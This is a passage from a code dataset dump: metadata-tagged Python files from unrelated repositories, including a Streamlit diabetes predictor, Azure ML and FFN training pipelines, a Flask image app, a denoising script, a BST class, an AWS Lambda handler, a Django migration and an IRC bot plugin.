st\nst.set_page_config(layout=\"wide\")\nst.write(\"\"\"\n# Welcome to Diabetes Detection Webpage\n\"\"\")\nst.write('*******')\nimage = Image.open('Capture.JPG')\n\n#image\n\n# st.image(image,caption='ML',use_column_width=True)\n\ndf = pd.read_csv('diabetes.csv')\n\n#df\n\n# st.subheader('Data Information :')\n# st.dataframe(df)\n# st.write(df.describe())\n\n# chart = st.bar_chart(df)\n\ny = df['Outcome']\n\nX = df.drop(['Outcome'],axis=1)\n\n#X\n\n#y\n\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.25,random_state=0)\n\n# Get the feature input from users\n\n# X.columns\n\n# X['Insulin'].max()\n\ndef get_user_input():\n Pregnancies = st.sidebar.slider('Pregnancies',0,17,3)\n Glucose = st.sidebar.slider('Glucose',0,199,117)\n BloodPressure = st.sidebar.slider('BloodPressure',0,160,72)\n SkinThickness = st.sidebar.slider('SkinThickness',0,99,23)\n Insulin = st.sidebar.slider('Insulin',0.0,846.0,30.0)\n BMI = st.sidebar.slider('BMI',0.0,67.1,32.0)\n DiabetesPedigreeFunction = st.sidebar.slider('Diab. Pedigree Func',0.078,2.42,0.3725)\n Age = st.sidebar.slider('Age',20,100,30)\n\n user_data = {'Pregnancies': Pregnancies,\n 'Glucose' : Glucose,\n 'BloodPressure' : BloodPressure,\n 'SkinThickness' : SkinThickness,\n 'Insulin': Insulin,\n 'BMI': BMI,\n 'DiabetesPedigreeFunction': DiabetesPedigreeFunction,\n 'Age': Age\n }\n features = pd.DataFrame(user_data,index =[0])\n return features\n\nuser_input = get_user_input()\n\nst.subheader('Patient entered medical data (as selected via slider on the left) : ')\n\nst.write(user_input)\n\nRandomForestClassifier = RandomForestClassifier()\nRandomForestClassifier.fit(X_train,y_train)\n\nprediction = RandomForestClassifier.predict(user_input)\n\n# st.subheader('Machine Learning Model Prediction: Patient is - ')\n# st.write(prediction)\n\nif prediction == 1:\n st.subheader('Machine Learning Model Prediction : Member is diabetic')\nelse:\n st.subheader('Machine Learning Model Prediction : Member is non-diabetic')\n\nst.subheader('Machine Learning Model Confidence level(Test Accuracy Score) is :')\nst.write(str(accuracy_score(y_test,RandomForestClassifier.predict(X_test)) *100) +'%')\n","repo_name":"DineshAnalyticsandAI/Diabetes-Detection","sub_path":"diabetes.py","file_name":"diabetes.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32307147578","text":"from azureml.pipeline.core.graph import PipelineParameter\r\nfrom azureml.pipeline.steps import RScriptStep, PythonScriptStep\r\nfrom azureml.pipeline.core import Pipeline\r\nfrom azureml.core import Workspace, Model\r\nfrom azureml.core.experiment import Experiment\r\nfrom azureml.core.runconfig import RunConfiguration, CondaDependencies\r\nfrom azureml.core import Dataset, Datastore\r\nfrom dotenv import load_dotenv\r\nimport os\r\nimport sys\r\nsys.path.append(os.path.abspath(\"./util\")) \r\nfrom attach_compute import get_compute\r\nfrom env_variables import Env\r\nfrom azureml.core.authentication import ServicePrincipalAuthentication\r\n\r\ndef main():\r\n e = Env()\r\n print(e.workspace_name)\r\n\r\n svc_pr = ServicePrincipalAuthentication(\r\n tenant_id=os.environ.get(\"TENANT_ID\"),\r\n service_principal_id=os.environ.get(\"AZURE_SP_ID\"),\r\n service_principal_password=os.environ.get(\"AZURE_SP_PASSWORD\"))\r\n\r\n # Get Azure machine learning workspace\r\n ws = Workspace.get(\r\n name=os.environ.get(\"WORKSPACE_NAME\"),\r\n subscription_id=os.environ.get(\"SUBSCRIPTION_ID\"),\r\n resource_group=os.environ.get(\"AZURE_RESOURCE_GROUP\")\r\n ,auth=svc_pr\r\n )\r\n\r\n #ex = Experiment(ws, 'iris-pipeline')\r\n #ex.archive()\r\n\r\n print(\"get_workspace:\")\r\n print(ws)\r\n ws.write_config(path=\"\", file_name=\"config.json\")\r\n print(\"writing config.json.\")\r\n\r\n # Get Azure machine learning cluster\r\n aml_compute = get_compute(\r\n ws,\r\n \"train-cluster\",\r\n \"STANDARD_DS2_V2\")\r\n if aml_compute is not None:\r\n print(\"aml_compute:\")\r\n print(aml_compute)\r\n\r\n run_config = RunConfiguration(conda_dependencies=CondaDependencies.create(\r\n conda_packages=['numpy', 'pandas',\r\n 'scikit-learn', 'tensorflow', 'keras'],\r\n pip_packages=['azure', 'azureml-core',\r\n 'azureml-pipeline',\r\n 'azure-storage',\r\n 'azure-storage-blob',\r\n 'azureml-dataprep'])\r\n )\r\n run_config.environment.docker.enabled = True\r\n\r\n ######### TRAIN ################\r\n train_step = PythonScriptStep(\r\n name=\"Train\",\r\n source_directory=\"models/python/iris/train\",\r\n script_name=\"train.py\",\r\n compute_target=aml_compute,\r\n arguments=[\r\n ],\r\n runconfig=run_config,\r\n allow_reuse=False,\r\n )\r\n print(\"Train Step created\")\r\n\r\n ######### EVALUATE ################\r\n evaluate_step = PythonScriptStep(\r\n name=\"Evaluate\",\r\n source_directory=\"models/python/iris/evaluate\",\r\n script_name=\"evaluate.py\",\r\n compute_target=aml_compute,\r\n arguments=[\r\n ],\r\n runconfig=run_config,\r\n allow_reuse=False,\r\n )\r\n print(\"Evaluate Step created\")\r\n\r\n ######### REGISTER ################\r\n register_step = PythonScriptStep(\r\n name=\"Register\",\r\n source_directory=\"models/python/iris/register\",\r\n script_name=\"register.py\",\r\n compute_target=aml_compute,\r\n arguments=[\r\n ],\r\n runconfig=run_config,\r\n allow_reuse=False,\r\n )\r\n print(\"Register Step created\")\r\n\r\n #evaluate_step.run_after(train_step)\r\n register_step.run_after(train_step)\r\n steps = [train_step, register_step]\r\n train_pipeline = Pipeline(workspace=ws, steps=steps)\r\n train_pipeline._set_experiment_name\r\n train_pipeline.validate()\r\n\r\n published_pipeline = train_pipeline.publish(\r\n name=\"iris-pipeline\",\r\n description=\"\"\r\n )\r\n print(f'Published pipeline: {published_pipeline.name}')\r\n print(f'for build {published_pipeline.version}')\r\n\r\n pipeline_parameters = { \r\n \"model_name\": \"iris-pipeline-param\" \r\n }\r\n run = published_pipeline.submit(\r\n ws,\r\n \"iris-pipeline-experiment\",\r\n pipeline_parameters\r\n )\r\n #run.wait_for_completion(show_output=True)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"p3ngu1nx/aml-pipeline-deploy","sub_path":".ipynb_checkpoints/create-checkpoint.py","file_name":"create-checkpoint.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1450036527","text":"from flask import Flask, request, render_template, send_file\nfrom PIL import Image, ImageEnhance\nfrom io import BytesIO\nimport io\nfrom werkzeug.datastructures import FileStorage\n# from skimage import io\n# from werkzeug import secure_filename\n\napp = Flask(__name__)\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n title = 'This is Fix Image App!!'\n \n if request.method == 'GET':\n return render_template('index.html', title=title)\n # else:\n # f = request.files['file']\n # print(\"f is :\"+ str(f))\n # img_bright = f.point(lambda x:x*1.8)\n \n # return send_file(img_bright,\n # attachment_filename=f.filename,\n # as_attachment=True)\n else:\n f = request.files['file']\n buf = io.BytesIO()\n # adjust_contrast(f, buf, 1.7)\n adjust_bright(f, buf, 1.7)\n buf.seek(0)\n\n return send_file(buf,\n attachment_filename=f.filename,\n as_attachment=True)\n \n# def adjust_contrast(input_image, output_image, factor):\n# image = Image.open(input_image)\n# enhancer_object = ImageEnhance.Contrast(image)\n# out = enhancer_object.enhance(factor)\n# out.save(output_image, 'JPEG')\n\ndef adjust_bright(input_image, output_image, factor):\n image = Image.open(input_image)\n enhancer_object = ImageEnhance.Brightness(image)\n out = enhancer_object.enhance(factor)\n out.save(output_image, 'JPEG')\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"yukiozawa/fix_image","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39232824362","text":"import cv2\nimport os\nwhile True:\n file = \"bg.gif\"\n cap = cv2.VideoCapture(file)\n\n if not cap.isOpened():\n print(\"ERROR OPENING GIF\")\n exit()\n\n fps = cap.get(cv2.CAP_PROP_FPS)\n total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n output_dir = \"temp_frames\"\n os.makedirs(output_dir, exist_ok=True)\n\n for frame_number in range(total_frames):\n ret,frame = cap.read()\n if not ret:\n break\n\n temp_image_path = os.path.join(output_dir,f\"frame_{frame_number:04d}.png\")\n cv2.imwrite(temp_image_path,frame)\n os.system(f\"nitrogen --set-zoom-fill --save { temp_image_path }\")\n\n cap.release()\n","repo_name":"mk020846/nitrogen_animated_background","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42602625022","text":"import os\nimport time\n\nfrom google.protobuf import text_format\nfrom absl import app\nfrom absl import flags\nfrom tensorflow import gfile\nimport tensorflow as tf\nfrom ffn.utils import bounding_box_pb2\nfrom ffn.inference import inference\nfrom ffn.inference import inference_flags\nimport train_functional\n\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string('bounding_box', None,\n 'BoundingBox proto in text format defining the area '\n 'to segmented.')\n\n\ndef main(unused_argv):\n request = inference_flags.request_from_flags()\n if not gfile.Exists(request.segmentation_output_dir):\n gfile.MakeDirs(request.segmentation_output_dir)\n\n bbox = bounding_box_pb2.BoundingBox()\n text_format.Parse(FLAGS.bounding_box, bbox)\n\n # Training\n import os\n batch_size = 16\n max_steps = 3000#10*250/batch_size #250\n hdf_dir = os.path.split(request.image.hdf5)[0]\n load_ckpt_path = request.model_checkpoint_path\n save_ckpt_path = os.path.split(load_ckpt_path)[0]+'_topup_'+ os.path.split(os.path.split(hdf_dir)[0])[1]\n # import ipdb;ipdb.set_trace()\n with tf.Graph().as_default():\n with tf.device(tf.train.replica_device_setter(FLAGS.ps_tasks, merge_devices=True)):\n # SET UP TRAIN MODEL\n print('>>>>>>>>>>>>>>>>>>>>>>SET UP TRAIN MODEL')\n\n TA = train_functional.TrainArgs(train_coords= os.path.join(hdf_dir, 'tf_record_file'),\n data_volumes='jk:' + os.path.join(hdf_dir, 'grayscale_maps.h5') + ':raw',\n label_volumes='jk:' + os.path.join(hdf_dir, 'groundtruth.h5') + ':stack',\n train_dir=save_ckpt_path,\n model_name=request.model_name,\n model_args=request.model_args,\n image_mean=request.image_mean,\n image_stddev=request.image_stddev,\n max_steps=max_steps,\n optimizer='adam',\n load_from_ckpt=load_ckpt_path,\n batch_size=batch_size)\n global TA\n model_class = import_symbol(TA.model_name)\n seed = int(time.time() + TA.task * 3600 * 24)\n logging.info('Random seed: %r', seed)\n random.seed(seed)\n eval_tracker, model, secs, load_data_ops, summary_writer, merge_summaries_op = \\\n build_train_graph(model_class, TA,\n save_ckpt=False, with_membrane=TA.with_membrane, **json.loads(TA.model_args))\n\n\n # SET UP INFERENCE MODEL\n print('>>>>>>>>>>>>>>>>>>>>>>SET UP INFERENCE MODEL')\n print('>>>>>>>>>>>>>>>>>>>>>>COUNTED %s VARIABLES PRE-INFERENCE' % len(tf.trainable_variables()))\n runner = inference.Runner()\n runner.start(\n request,\n batch_size=1,\n topup={'train_dir': FLAGS.train_dir},\n reuse=tf.AUTO_REUSE,\n tag='_inference') #TAKES SESSION\n print('>>>>>>>>>>>>>>>>>>>>>>COUNTED %s VARIABLES POST-INFERENCE' % len(tf.trainable_variables()))\n\n # START TRAINING\n print('>>>>>>>>>>>>>>>>>>>>>>START TOPUP TRAINING')\n sess = train_functional.train_ffn(\n TA, eval_tracker, model, runner.session, load_data_ops, summary_writer, merge_summaries_op)\n\n # saver.save(sess, \"/tmp/model.ckpt\")\n\n # START INFERENCE\n print('>>>>>>>>>>>>>>>>>>>>>>START INFERENCE')\n # saver.restore(sess, \"/tmp/model.ckpt\")\n runner.run((bbox.start.z, bbox.start.y, bbox.start.x),\n (bbox.size.z, bbox.size.y, bbox.size.x))\n\n counter_path = os.path.join(request.segmentation_output_dir, 'counters.txt')\n if not gfile.Exists(counter_path):\n runner.counters.dump(counter_path)\n\n sess.close()\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"drewlinsley/ffn_membrane","sub_path":"run_inference_multi.py","file_name":"run_inference_multi.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"26783905083","text":"class Node:\r\n def __init__(self, index=-1, symbol=\"\"):\r\n self.left = None\r\n self.right = None\r\n self.index = index\r\n self.symbol = symbol\r\n\r\n\r\nclass BST:\r\n def __init__(self):\r\n self.count = 0\r\n self.root = None\r\n\r\n def insert_recursive(self, root, node):\r\n if root is None:\r\n self.root = node\r\n else:\r\n if root.symbol < node.symbol:\r\n if root.right is None:\r\n root.right = node\r\n else:\r\n self.insert_recursive(root.right, node)\r\n else:\r\n if root.left is None:\r\n root.left = node\r\n else:\r\n self.insert_recursive(root.left, node)\r\n\r\n def in_order_print(self, root):\r\n if root:\r\n self.in_order_print(root.left)\r\n print(f\"Symbol: {root.symbol} - Code: {root.index}\")\r\n self.in_order_print(root.right)\r\n\r\n def search_recursive(self, root, symbol):\r\n if root is None or root.symbol == symbol:\r\n return root\r\n\r\n if root.symbol < symbol:\r\n return self.search_recursive(root.right, symbol)\r\n else:\r\n return self.search_recursive(root.left, symbol)\r\n\r\n def search(self, symbol):\r\n return self.search_recursive(self.root, symbol)\r\n\r\n def insert(self, key):\r\n index = self.search(key)\r\n\r\n if index != -1 and index is not None:\r\n return index.index\r\n else:\r\n self.insert_recursive(self.root, Node(self.count, key))\r\n self.count += 1\r\n return self.count - 1\r\n\r\n def print(self):\r\n self.in_order_print(self.root)\r\n\r\n","repo_name":"polk15/FLCD","sub_path":"BST.py","file_name":"BST.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44291554970","text":"\nimport unittest, pytest\nimport os, math, random, collections, itertools, io, hashlib, binascii\n\nfrom construct import *\nfrom construct.lib import *\n\nontravis = \"TRAVIS\" in os.environ\nident = lambda x: x\ndevzero = open(\"/dev/zero\", \"rb\")\n\n\ndef raises(func, *args, **kw):\n try:\n func(*args, **kw)\n return None\n except Exception as e:\n return e.__class__\n\n\ndef atmostone(*args):\n return sum(1 for x in args if x) <= 1\n\n\ndef common(format, data, obj, size=SizeofError, **kw):\n assert format.parse(data, **kw) == obj\n assert format.build(obj, **kw) == data\n # following are implied by above (re-parse and re-build)\n # assert format.parse(format.build(obj)) == obj\n # assert format.build(format.parse(data)) == data\n if isinstance(size, int):\n assert format.sizeof(**kw) == size\n else:\n assert raises(format.sizeof, **kw) == size\n\n\ndef commonhex(format, hexdata):\n commonbytes(format, binascii.unhexlify(hexdata))\n\n\ndef commondump(format, filename):\n if ontravis:\n filename = \"examples/formats/\" + filename\n if not ontravis:\n filename = \"tests/examples/formats/\" + filename\n with open(filename,'rb') as f:\n data = f.read()\n commonbytes(format, data)\n\n\ndef commonbytes(format, data):\n obj = format.parse(data)\n data2 = format.build(obj)\n # protocol examples pass but format examples fail at this\n # assert binascii.hexlify(data2) == binascii.hexlify(data)\n","repo_name":"gitter-badger/construct","sub_path":"tests/declarativeunittest.py","file_name":"declarativeunittest.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"37246555073","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms.functional as tvF\nimport numpy as np\nimport time\nfrom PIL import Image\nimport cv2\nfrom argparse import ArgumentParser\n\nfrom net import MdSimpleNet,UNet\nuse_cuda = torch.cuda.is_available()\n\n########################################################\n# 可配参数\n########################################################\n#动检部分\nMD_NET_RECEPTIVE_FIELD = 8 #动检窗口大小\nMD_NET_STRIDE = 8 #动检滑窗步长\nMD_NET_THRESHOULD = 0.09 #动静判断阈值(差值/256)\nMD_HISTORY_NUM = 10 #动检判断用历史帧数(慢速移动物体)\n#降噪部分\nDENOISE_N2N_STRENGTH = 1.0 #n2n网络降噪强度(输出是噪声残差)\nSTATIC_DENOISE_WEMA = 0.9 #静止部分,时域衰减系数(WEMA)\n########################################################\n\n#降噪中间状态\ndenoise_status_image = None\n\n#调试标志\nDEBUG_DEFINE = 1\n\ndef parse_args():\n parser = ArgumentParser(description='PyTorch implementation of md & n2n (2018)')\n parser.add_argument('--data', help='dataset root path', default='../data')\n parser.add_argument('--result', help='dataset result path', default='../result')\n parser.add_argument('--n2n-ckpt', help='load md model checkpoint') \n return parser.parse_args()\n\n#https://blog.csdn.net/weixin_39128119/article/details/84172385\n#对mask图像进行膨胀操作\ndef do_dilate(mask):\n #Image转cv\n mask = np.array(mask)\n #图像的腐蚀-膨胀\n mask = cv2.dilate(mask,None,iterations=5)\n #cv转Image\n return Image.fromarray(mask)\n\n#输入图片,返回mask\ndef do_movedetect(model,frameA,frameB,frameC,frameD,frameE):\n tA = tvF.to_tensor(frameA).unsqueeze(0)\n tB = tvF.to_tensor(frameB).unsqueeze(0)\n tC = tvF.to_tensor(frameC).unsqueeze(0)\n tD = tvF.to_tensor(frameD).unsqueeze(0)\n tE = tvF.to_tensor(frameE).unsqueeze(0)\n if use_cuda:\n tA = tA.cuda()\n tB = tB.cuda()\n tC = tC.cuda()\n tD = tD.cuda()\n tE = tE.cuda()\n output = model(tA,tB,tC,tD,tE,MD_NET_RECEPTIVE_FIELD,MD_NET_STRIDE,MD_NET_THRESHOULD) #误差门限(/256)\n result = output.detach().squeeze(0).cpu()\n print(\"--->result.size:\",result.size())\n md_fmap = tvF.to_pil_image(result)\n print(\"--->md_fmap.size:\",md_fmap.size)\n \n #放大到原图:有技巧《学习笔记:关于感受野》\n image_box_x1 = MD_NET_RECEPTIVE_FIELD//2\n image_box_y1 = MD_NET_RECEPTIVE_FIELD//2\n image_box_x2 = (md_fmap.size[0]-1)*MD_NET_STRIDE+MD_NET_RECEPTIVE_FIELD//2\n image_box_y2 = (md_fmap.size[1]-1)*MD_NET_STRIDE+MD_NET_RECEPTIVE_FIELD//2\n #只是中间有效部分\n rsz_w = image_box_x2-image_box_x1+1\n rsz_h = image_box_y2-image_box_y1+1\n md_rsz = md_fmap.resize((rsz_w,rsz_h))\n #补全四周,得到原图的mask\n md_mask = Image.new(\"L\",(frameE.size))\n md_mask.paste(md_rsz,(image_box_x1,image_box_y1))\n return md_mask\n \ndef do_noise2noise(model,frame):\n #Unet的设计导致要32对齐\n w, h = frame.size \n if w % 32 != 0:\n w = (w//32)*32\n if h % 32 != 0:\n h = (h//32)*32\n crop_img = tvF.crop(frame, 0, 0, h, w)\n source = tvF.to_tensor(crop_img)\n source = source.unsqueeze(0)\n if use_cuda:\n source = source.cuda()\n # Denoise\n denoised = model(source).detach()\n denoised = denoised.cpu()\n denoised = denoised.squeeze(0)\n denoised = tvF.to_pil_image(denoised)\n #贴合原图大小\n frame.paste(denoised,(0, 0))\n return frame\n\ndef do_combine_fast(mdMask,noiseFrame,denoisedFrame):\n print(\"do_combine_fast-------->\")\n global denoise_status_image\n if denoise_status_image is None:\n print(mdMask.size)\n denoise_status_image = np.array(denoisedFrame,dtype=np.float32)\n print(denoise_status_image.shape) #HWC\n print(denoise_status_image.dtype)\n #根据动检结果进行融合\n mask = np.array(mdMask)\n mask_bd = np.zeros_like(noiseFrame)\n print(\"mask_bd.dtype--->\",mask_bd.dtype)\n mask_bd[:,:,0] = mask\n mask_bd[:,:,1] = mask\n mask_bd[:,:,2] = mask\n noiseFrame = np.array(noiseFrame)\n denoisedFrame = np.array(denoisedFrame)\n print(\"denoisedFrame.dtype--->\",denoisedFrame.dtype) \n #二值化\n static_mask = 1*(mask_bd <= 64)\n dynmic_mask = 1-static_mask\n #print(static_mask) \n #print(dynmic_mask) \n denoise_status_image = denoise_status_image*0.80 + (1-0.80)*static_mask*noiseFrame\n denoise_status_image = denoise_status_image*static_mask + dynmic_mask*denoisedFrame\n #转Image\n out = denoise_status_image.astype(np.uint8)\n print(\"do_combine_fast-------->finish\")\n return tvF.to_pil_image(out)\n \nif __name__ == '__main__':\n # Parse test parameters\n params = parse_args()\n\n # Initialize model and test\n md_simple = MdSimpleNet()\n n2n_model = UNet()\n if use_cuda:\n md_simple = md_simple.cuda()\n n2n_model = n2n_model.cuda()\n if use_cuda:\n n2n_model.load_state_dict(torch.load(params.n2n_ckpt))\n else:\n n2n_model.load_state_dict(torch.load(params.n2n_ckpt, map_location='cpu'))\n n2n_model.train(False)\n \n #处理每一张图片\n save_path = os.path.dirname(params.result)\n if not os.path.isdir(save_path):\n os.mkdir(save_path)\n input_path = params.data\n namelist = [name for name in os.listdir(input_path) if \"groundtruth\" not in name]\n namelist.sort(key=lambda x:int(x.replace(\".jpg\",\"\")))\n print(namelist)\n \n #5帧求最大值\n for a,b,c,d,e in zip(range(0,len(namelist)-4),range(1,len(namelist)-3),range(2,len(namelist)-2),range(3,len(namelist)-1),range(4,len(namelist))):\n print(a,b,c,d,e)\n print(namelist[a],namelist[b],namelist[c],namelist[d],namelist[e])\n imgA_path = os.path.join(input_path,namelist[a])\n imgB_path = os.path.join(input_path,namelist[b])\n imgC_path = os.path.join(input_path,namelist[c])\n imgD_path = os.path.join(input_path,namelist[d])\n imgE_path = os.path.join(input_path,namelist[e])\n imgA = Image.open(imgA_path).convert('RGB')\n imgB = Image.open(imgB_path).convert('RGB')\n imgC = Image.open(imgC_path).convert('RGB')\n imgD = Image.open(imgD_path).convert('RGB')\n imgE = Image.open(imgE_path).convert('RGB')\n #先做去噪\n dn_imgA = do_noise2noise(n2n_model,imgA)\n dn_imgB = do_noise2noise(n2n_model,imgB)\n dn_imgC = do_noise2noise(n2n_model,imgC)\n dn_imgD = do_noise2noise(n2n_model,imgD)\n dn_imgE = do_noise2noise(n2n_model,imgE)\n if DEBUG_DEFINE : #调试信息输出\n dn_imgE.save(os.path.join(save_path, f'{namelist[e]}-1dn.jpg'))\n #再做动检\n md_mask = do_movedetect(md_simple,dn_imgA,dn_imgB,dn_imgC,dn_imgD,dn_imgE)\n if DEBUG_DEFINE : #调试信息输出\n md_red_label = Image.new(\"RGB\",(imgE.size),(255,0,0)) \n md_red = Image.composite(md_red_label,imgE,md_mask)\n md_red.save(os.path.join(save_path, f'{namelist[e]}-2md.jpg'))\n \n #对mask进行膨胀,填补空洞\n dilate_mask = do_dilate(md_mask) \n if DEBUG_DEFINE : #调试信息输出\n dilate_red = Image.composite(md_red_label,imgE,dilate_mask)\n dilate_red.save(os.path.join(save_path, f'{namelist[e]}-3dilate.jpg'))\n \n #再进行融合\n out2 = do_combine_fast(dilate_mask,imgE,dn_imgE)\n out2.save(os.path.join(save_path, f'ok_{namelist[e]}.jpg'))\n #exit(0)\n","repo_name":"XmNewISP/Combine_MD_DN","sub_path":"_bak/test_simplemd2.py","file_name":"test_simplemd2.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"70172307530","text":"import copy\nimport json\n\nimport boto3\n\n\ndef lambda_handler(event, context):\n s3_client = boto3.client('s3')\n bucket_name = event['intermediate_s3_name']\n s3_path = '{}/additionalInfo.txt'.format(event['intermediate_directory_path'])\n additional_info = copy.deepcopy(event)\n additional_info.pop('intermediate_s3_name', None)\n additional_info.pop('intermediate_directory_path', None)\n\n additional_info_str = json.dumps(additional_info)\n print(\"Additional info: %s\" % additional_info_str)\n\n try:\n response = s3_client.get_object(Bucket=bucket_name, Key=s3_path)\n current_content = response['Body'].read().decode('utf-8')\n print(\"Reading content from file at s3:%s key:%s\" % (bucket_name, s3_path))\n new_string = '{}, {}'.format(current_content, additional_info_str)\n except s3_client.exceptions.NoSuchKey:\n print(\"Created a new file at s3:%s key:%s\" % (bucket_name, s3_path))\n new_string = additional_info_str\n\n encoded_string = new_string.encode(\"utf-8\")\n\n response_from_s3_put = s3_client.put_object(Bucket=bucket_name, Key=s3_path, Body=encoded_string)\n\n return {\n 'statusCode': 200,\n 'body': json.dumps(response_from_s3_put)\n }\n","repo_name":"fnotess/sample-python-lambdas-glue-and-pyspark-scripts","sub_path":"src/common/metadata_aggregator.py","file_name":"metadata_aggregator.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11402240291","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport SESite.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('SESite', '0007_courseintro_taintro'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Homework',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=100)),\n ('description', models.CharField(max_length=2000)),\n ('post_time', models.DateTimeField(auto_now_add=True)),\n ('due_time', models.DateTimeField()),\n ('assigner', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'db_table': 'Homework',\n },\n ),\n migrations.CreateModel(\n name='StudentHomework',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('post_time', models.DateTimeField(auto_now_add=True)),\n ('homeworkfile', models.FileField(upload_to=SESite.models.homework_upload_directory_path)),\n ('score', models.DecimalField(max_digits=4, decimal_places=1)),\n ('homeworkid', models.ForeignKey(to='SESite.Homework')),\n ('student_ID', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'db_table': 'StudentHomework',\n },\n ),\n ]\n","repo_name":"nan-mu-cs/SECourseWebsite","sub_path":"SESite/migrations/0008_homework_studenthomework.py","file_name":"0008_homework_studenthomework.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35453936382","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport defaultplugin\n\n\nimport pickle\nimport os\nimport urllib.request, urllib.error, urllib.parse\n\nclass plugin(defaultplugin.plugin):\n\n\tcounter = 0\n\n\tdef onMessage(self,bot,message):\n\t\tif message.text.startswith(\"%test \"):\n\t\t\tresponse = urllib.request.urlopen(\" \".join(message.text.split(\" \")[1:]))\n\t\t\thtml = response.read()\n\t\t\tprint(html)\n\n\t\t\n\n\n\n\t\"\"\"\tdef onAction(self,ubot,message):\n\t\t\tprint message.text\n\t\t\tprint \"floods \"+message.target+\" with kittens\"\n\t\t\tif message.text.find(\"floods \"+message.target+\" with kittens\") != -1:\n\t\t\t\tfor i in range(1,20):\n\t\t\t\t\ttempbot = bot.bot(\"kitten\"+str(i))\n\t\t\t\t\ttempbot.connect(\"irc.compsoc.kent.ac.uk\",6667)\n\t\t\t\t\tthread.start_new_thread(tempbot.run,())\n\t\t\t\t\ttempbot.send(message.target,\"meow\")\n\t\t\t\t\t#tempbot.disconnect()\n\t\t\t\t\t#tempbot.quit()\"\"\"\n\n\n\t\t\n\tdef onLoad(self,bot):\n\t\ttry:\n\t\t\tself.counter = pickle.load( open( os.path.join(bot.dir, \"test.save\"), \"rb\" ) )\n\t\texcept Exception as e:\n\t\t\tprint(\"error loading saved data: %s\" % e)\n\t\tprint(\"LOADED\")\n\n\tdef onUnload(self,bot):\n\t\ttry:\n\t\t\tpickle.dump( self.counter, open( os.path.join(bot.dir, \"test.save\"), \"wb\" ) )\n\t\texcept Exception as e:\n\t\t\tprint(\"error saving data: %s\" % e)\n\t\tprint(\"UNLOADED\")\n\n\n","repo_name":"ellxc/OLDMarvin","sub_path":"plugins/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22338185116","text":"#!/usr/bin/python3\n\"\"\" 101-main \"\"\"\n\n\ndef add_attribute(obj, attr_name, attr_value):\n \"\"\"\n Add a new attribute to an object if it's possible.\n \"\"\"\n if not hasattr(obj, '__dict__') and not (hasattr(obj, '__slots__')\n and attr_name in obj.__slots__):\n raise TypeError(\"can't add new attribute\")\n setattr(obj, attr_name, attr_value)\n","repo_name":"SMCastr/holbertonschool-higher_level_programming","sub_path":"python-inheritance/101-add_attribute.py","file_name":"101-add_attribute.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12631363157","text":"import cv2\nimport tensorflow as tf\n\ndef prepare(filepath):\n IMG_SIZE = 240 # 50 in txt-based\n img_array = cv2.imread(filepath) # read in the image, convert to grayscale\n new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) # resize image to match model's expected sizing\n return new_array.reshape(-3, IMG_SIZE, IMG_SIZE, 3) # return the image with shaping that TF wants.\n\ndef get_yes_no():\n model = tf.keras.models.load_model(\"Model_Yes_No/model_yes_no.model\")\n\n prediction = model.predict([prepare('Images/Input/img_original.jpg')])\n\n result = int(prediction[0][0])\n return result\n","repo_name":"Anjanahg/FYP_Final","sub_path":"Cnn_Yes_No.py","file_name":"Cnn_Yes_No.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25289558875","text":"import numpy as np\nimport pandas as 